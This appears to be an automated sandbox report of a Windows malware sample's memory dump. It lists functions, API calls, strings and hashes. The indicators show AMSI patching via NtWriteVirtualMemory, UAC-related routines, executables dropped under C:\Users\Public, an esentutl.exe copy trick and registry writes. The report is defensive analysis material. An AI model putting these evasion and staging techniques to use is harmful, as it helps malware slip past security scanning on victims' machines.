ScanBuffer, xrefs: 02B33FFB, 02B34202, 02B34380, 02B34503, 02B3457F, 02B34736, 02B34947, 02B34B3C, 02B34D8C, 02B34F7C, 02B351F7, 02B3546F, 02B356B0, 02B359EA, 02B35D03, 02B36083, 02B363BC, 02B36666, 02B3686B, 02B369D1, 02B36B45, 02B36BC1
OpenSession, xrefs: 02B34158, 02B34304, 02B34487, 02B348CB, 02B34AC0, 02B34C18, 02B34F00, 02B3517B, 02B352FB, 02B35634, 02B357CE, 02B3596E, 02B35B13, 02B35C87, 02B35ED7, 02B35F8B, 02B36248, 02B36340, 02B367EF, 02B36AC9, 02B36C3D, 02B36DD3, 02B36F83
lld.SLITUTEN, xrefs: 02B3480C
C:\Users\Public\pha.exe, xrefs: 02B3551B
/o, xrefs: 02B364C0
ScanString, xrefs: 02B33F03, 02B349C8, 02B34E08, 02B34FFD, 02B355B8, 02B35752, 02B35A97, 02B35E5B, 02B364F2, 02B36CD8, 02B36E4F, 02B36F07
HotKey=, xrefs: 02B36EE1
UacUninitialize, xrefs: 02B33E1E, 02B3463E, 02B34C94, 02B35377
C:\\Users\\Public\\Libraries\\, xrefs: 02B3616F
C:\Users\Public\, xrefs: 02B35D88, 02B36FF3
C:\\Windows \\SysWOW64\\per.exe, xrefs: 02B343F5
C:\\Windows\\System32\\esentutl.exe /y , xrefs: 02B364AA
C:\\Windows \\SysWOW64\\, xrefs: 02B34822
[InternetShortcut], xrefs: 02B36D48
/d , xrefs: 02B364B5
UacInitialize, xrefs: 02B34A44, 02B34E84, 02B350FF, 02B3553C, 02B358F2, 02B35DDF
C:\Users\Public\CApha.exe, xrefs: 02B35500
UacScan, xrefs: 02B33F7F, 02B340DC, 02B34288, 02B3440B, 02B345DC, 02B346BA, 02B3484F, 02B34D10, 02B35079, 02B353F3, 02B35B8F, 02B360FF, 02B362C4, 02B365EA, 02B366F7, 02B36955, 02B36A4D
URL=file:", xrefs: 02B36D57
.url, xrefs: 02B35D93
IconIndex=, xrefs: 02B36DAD
C:\Users\Public\alpha.exe, xrefs: 02B354E5

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
API String ID: 2171786310-3926298568
Opcode ID: a5b7a353f178f0ba000926f55702d93c9aa022628ed425f8b21b61047277497a
Instruction ID: 62078ccba6966533380f2eae02c982846eff6cc491d1a7ac3b9f7e4da3072893
Opcode Fuzzy Hash: a5b7a353f178f0ba000926f55702d93c9aa022628ed425f8b21b61047277497a
Instruction Fuzzy Hash: 6143F475A0016D9FDB21EB64DD80BDE73B6FF85304FA040E6A409AB618DF30AE859F51

Function 02B2E678 Relevance: 25.1, APIs: 3, Strings: 11, Instructions: 562
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02B289D0: FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,74AD0000,00000000,00000000), ref: 02B28AAA

Part of subcall function 02B28788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B28814

Part of subcall function 02B2894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
Part of subcall function 02B2894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
Part of subcall function 02B2894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6

WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02B97380,02B2EF4C,OpenSession,02B97380,02B2EF4C,UacScan,02B97380,02B2EF4C,ScanBuffer,02B97380,02B2EF4C,OpenSession,02B97380), ref: 02B2ED6E
CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02B97380,02B2EF4C,OpenSession,02B97380,02B2EF4C,UacScan,02B97380,02B2EF4C,ScanBuffer,02B97380,02B2EF4C,OpenSession), ref: 02B2ED76
CloseHandle.KERNEL32(00000884,00000000,00000000,000000FF,ScanString,02B97380,02B2EF4C,OpenSession,02B97380,02B2EF4C,UacScan,02B97380,02B2EF4C,ScanBuffer,02B97380,02B2EF4C), ref: 02B2ED7F

Strings

UacScan, xrefs: 02B2E6B8, 02B2E85D, 02B2E9F5, 02B2EC35, 02B2EE78
ScanBuffer, xrefs: 02B2EBE6, 02B2EE29
AmsiOpenSession, xrefs: 02B2E814
ScanString, xrefs: 02B2E76A, 02B2E90F, 02B2EAD7, 02B2ECFF
ntdll, xrefs: 02B2EEC5, 02B2EED6
NtOpenProcess, xrefs: 02B2EED1
Initialize, xrefs: 02B2EB48, 02B2ED8B
NtSetSecurityObject, xrefs: 02B2EEC0
Amsi, xrefs: 02B2E825
)"C:\Users\Public\Libraries\lxsyrsiW.cmd" , xrefs: 02B2E7F1, 02B2E9B3
OpenSession, xrefs: 02B2E711, 02B2E8B6, 02B2EA66, 02B2EB97, 02B2EC8E, 02B2EDDA

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
String ID: )"C:\Users\Public\Libraries\lxsyrsiW.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
API String ID: 3475578485-1053911981
Opcode ID: 0a6ddb2d7eb5777d3af45d2f8b7fc4ea178817638cecd22a24c7050454c484b1
Instruction ID: c80103336dc4fed7a1c2e7ba24b12b97f04995ee7cfe0ec7b825dfb9d7ce315a
Opcode Fuzzy Hash: 0a6ddb2d7eb5777d3af45d2f8b7fc4ea178817638cecd22a24c7050454c484b1
Instruction Fuzzy Hash: 0622D375A0026D9FEB11FB65D881BCE73B6AF85300F5041E1A149EB254DB30EE49CF66

Function 02B11724 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,02B12000), ref: 02B117D0
Sleep.KERNEL32(0000000A,00000000,?,02B12000), ref: 02B117E6

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 0ca9bd1b1e55afa0bba095f8255723665db62d9419609990163a9b08d2bfdbe1
Instruction ID: e98d19a584a4a14518f7b71833429673fc6a28459c8dd0196ed9c6544a041184
Opcode Fuzzy Hash: 0ca9bd1b1e55afa0bba095f8255723665db62d9419609990163a9b08d2bfdbe1
Instruction Fuzzy Hash: 3DB15372A203518BCB15CF2CE980315BBF1EB86394F59C6EED65D8B385C735A452CB90

Function 02B288B8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(amsi), ref: 02B288C1

Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9

Part of subcall function 02B27D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC

FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B28920

Strings

DllGetClassObject, xrefs: 02B288E6
W, xrefs: 02B288CD
amsi, xrefs: 02B288BC

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
String ID: DllGetClassObject$W$amsi
API String ID: 941070894-2671292670
Opcode ID: 73abcdcff65fe1647ab81f3d83f67567c4d9565d551df570b8e744055f09e53f
Instruction ID: e7da6ab78f48232b107c71d9bf42d7596247465db451df0a5cebfbcc025119e1
Opcode Fuzzy Hash: 73abcdcff65fe1647ab81f3d83f67567c4d9565d551df570b8e744055f09e53f
Instruction Fuzzy Hash: 9DF0A45044C381B9E300E3748C45F4BBFCD4B62264F408A98B1ECAA2D2D679D1089B77

Function 02B11A8C Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,?,00000000,02B11FE4), ref: 02B11B17
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02B11FE4), ref: 02B11B31

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2a8360d36b169dacd013ff447331c43ffa879f9cd7675f189318f26dcddb4d92
Instruction ID: ff043b244d0d6a75d583dfe07d5e3ff072b404c752661627741e3c0732ec4baa
Opcode Fuzzy Hash: 2a8360d36b169dacd013ff447331c43ffa879f9cd7675f189318f26dcddb4d92
Instruction Fuzzy Hash: B351EE71A212408FDB15CF6CCA84766BBE0EF4A314F9885EED648CB2C2E774C445CBA1

Function 02B2E4B6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B2E5F6

Strings

ScanBuffer, xrefs: 02B2E53F
Initialize, xrefs: 02B2E4E6
OpenSession, xrefs: 02B2E598

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 5495862f0f1bddf8e3835711096b5d896cf7844ecb1634bece4bf00fd7b1ad99
Instruction ID: 76d3459666785fb69980c82cbbb91271009e13b4435a24c9db67cefb44b155cd
Opcode Fuzzy Hash: 5495862f0f1bddf8e3835711096b5d896cf7844ecb1634bece4bf00fd7b1ad99
Instruction Fuzzy Hash: FC413B75B002189FEB01EBA4D881ADEB3BAEF88700FA044B6E145E7255DA70FD098F55

Function 02B285BA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON

Download Yara Rule

APIs

Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E

Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9

WinExec.KERNEL32(?,?), ref: 02B28624

Strings

WinExec, xrefs: 02B285D5
Kernel32, xrefs: 02B28607

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: de4c438d1842c0d53df6f004f92959f147baa97e82033299aa8200b803261e8c
Instruction ID: 474f45942380282da43f5fc0f3f10ac7b2e9ad0c667e0a98645b595e1c511140
Opcode Fuzzy Hash: de4c438d1842c0d53df6f004f92959f147baa97e82033299aa8200b803261e8c
Instruction Fuzzy Hash: 560181B1694314BFEB01EFA4DC01F5A77FDE709700FA084A0F908D3650DA34AD159A25

Function 02B285BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON

Download Yara Rule

APIs

Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E

Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9

WinExec.KERNEL32(?,?), ref: 02B28624

Strings

WinExec, xrefs: 02B285D5
Kernel32, xrefs: 02B28607

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: d0e22067127069d00553c8d87b508e1811c51134550d7c6342ed30fb074124b7
Instruction ID: 78092c23edb0741e8d385a2d3ff20ef1e16d16e6999086907ed04610de41314e
Opcode Fuzzy Hash: d0e22067127069d00553c8d87b508e1811c51134550d7c6342ed30fb074124b7
Instruction Fuzzy Hash: 2CF081B1694314BFEB01EFA4DC01F5A77FDE709700FA084A0F908D3650DA34AD159A25

Function 02B25C2C Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B25D74,?,?,02B23900,00000001), ref: 02B25C88
GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B25D74,?,?,02B23900,00000001), ref: 02B25CB6

Part of subcall function 02B17D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02B23900,02B25CF6,00000000,02B25D74,?,?,02B23900), ref: 02B17DAA

Part of subcall function 02B17F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02B23900,02B25D11,00000000,02B25D74,?,?,02B23900,00000001), ref: 02B17FB7

GetLastError.KERNEL32(00000000,02B25D74,?,?,02B23900,00000001), ref: 02B25D1B

Part of subcall function 02B1A778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02B1C3D9,00000000,02B1C433), ref: 02B1A797

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: CreateErrorFileLast$FormatFullMessageNamePath
String ID:
API String ID: 503785936-0
Opcode ID: baf3ed8c469578cbf0b5a3d49de77a98abf575e316f9e33ab2595bd9827d2b35
Instruction ID: 1e8b4b0daa47cb5162ecb49c8fec66eaa457c7880b1a38e29eadc896d460feef
Opcode Fuzzy Hash: baf3ed8c469578cbf0b5a3d49de77a98abf575e316f9e33ab2595bd9827d2b35
Instruction Fuzzy Hash: 34319570E007189FDB10EFA4C985BDEBBF6AF09700FD040A5E504AB390DB756A098FA1

Function 02B2F212 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,02C8BA58), ref: 02B2F258
RegSetValueExA.ADVAPI32(00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02B2F2C3), ref: 02B2F290
RegCloseKey.ADVAPI32(00000888,00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02B2F2C3), ref: 02B2F29B

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: f7ac8511ed67d9011d622b1fb37030d9d1624884c990d6728317bfabeb952f58
Instruction ID: aaf8704048b86ca2001737db9a699a66b180aaff3b6f120fedb44d426fd9641c
Opcode Fuzzy Hash: f7ac8511ed67d9011d622b1fb37030d9d1624884c990d6728317bfabeb952f58
Instruction Fuzzy Hash: 8E110AB1A40208AFEB00EFA8DD81E9E7BFDEB09740B9045A1B614D7655EB30EE448F54

Function 02B2F214 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,02C8BA58), ref: 02B2F258
RegSetValueExA.ADVAPI32(00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02B2F2C3), ref: 02B2F290
RegCloseKey.ADVAPI32(00000888,00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02B2F2C3), ref: 02B2F29B

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: 7ee005d2cb1d7f3d4e43fee173dcea621e64e743096c6e28576a293a07628b1c
Instruction ID: c583a64b6425cf91fa3f8dd343c2bc0a43ac95fed810b29f680252759cda958d
Opcode Fuzzy Hash: 7ee005d2cb1d7f3d4e43fee173dcea621e64e743096c6e28576a293a07628b1c
Instruction Fuzzy Hash: 201106B1A40208AFEB00EFA8DD81E9E7BFDEB09740B9045A1B614D7655EB30EE448F54

Function 02B1E364 Relevance: 4.5, APIs: 3, Instructions: 45COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 02B1E373

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: a392d9e270fc91b1ba68ab055f0b80df070bc73b3a8ae4f5386a0c57aaab5823
Instruction ID: cf62b1e7ffc386619a5091bbe796d19930a87376fbd5c22f54b4b25ff03de1a5
Opcode Fuzzy Hash: a392d9e270fc91b1ba68ab055f0b80df070bc73b3a8ae4f5386a0c57aaab5823
Instruction Fuzzy Hash: B8F09660718110C7DB2A7B39AD8466D379AAF403407D094F6EC07DB155DF64CC85D762

Function 02B14D50 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(02B2F4A4), ref: 02B14C6E
SysAllocStringLen.OLEAUT32(?,?), ref: 02B14D5B
SysFreeString.OLEAUT32(00000000), ref: 02B14D6D

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
Instruction ID: 52ec3ed92abf5c86fe2e09f386c8718117f591d01557897fc6ce4818e05abfed
Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
Instruction Fuzzy Hash: 5FE017F82152056EEF186F25DD40B3B373AEFC2741BE484E9A940CA164DB3CD840AE78

Function 02B270DC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 02B273DA

Strings

H, xrefs: 02B27191

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: 944f5d6bc4815127c9b9f3be5b6a46648a0525cd707318ae2bc5a12718da4cbf
Instruction ID: ffe24a56b4168493fdef9377ecc37c51d95c0c553f498a8a1f70b13c89e80fff
Opcode Fuzzy Hash: 944f5d6bc4815127c9b9f3be5b6a46648a0525cd707318ae2bc5a12718da4cbf
Instruction Fuzzy Hash: CFB1E474A017189FDB14CF99D580A9DFBF2FF89314F2481A9E849AB360DB30A849DF54

